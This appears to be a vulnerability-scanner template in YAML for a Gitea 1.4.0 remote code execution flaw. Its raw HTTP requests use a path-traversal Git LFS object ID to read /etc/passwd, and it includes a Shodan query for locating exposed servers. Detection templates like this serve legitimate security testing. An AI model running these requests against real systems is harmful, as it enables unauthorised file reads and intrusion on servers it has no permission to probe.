62 lines
1.7 KiB
YAML
62 lines
1.7 KiB
YAML
id: gitea-rce
|
|
|
|
info:
|
|
name: Gitea 1.4.0 - Remote Code Execution
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
Gitea 1.4.0 is vulnerable to remote code execution.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/44996
|
|
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
|
|
tags: gitea,rce,unauth,edb
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /api/v1/repos/search?limit=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /{{repo}}.git/info/lfs/objects HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
Accept: application/vnd.git-lfs+json
|
|
|
|
{
|
|
"Oid": "....../../../etc/passwd",
|
|
"Size": 1000000,
|
|
"User" : "{{randstr}}",
|
|
"Password" : "{{randstr}}",
|
|
"Repo" : "{{randstr}}",
|
|
"Authorization" : "{{randstr}}"
|
|
}
|
|
- |
|
|
GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body_3
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header_3
|
|
words:
|
|
- "application/octet-stream"
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: repo
|
|
group: 1
|
|
regex:
|
|
- '"name":".*","full_name":"(.*)","description"'
|
|
internal: true
|
|
|
|
# digest: 490a0046304402206bedfc95c5c775b9dab649e784921360bfcc0c684722fd67533e2def7e40cc7c0220665341d1ed01c8bdfa56d062fc988325a387a1fccda93d31db3dd809072ef49c:922c64590222798bb761d5b6d8e72950
|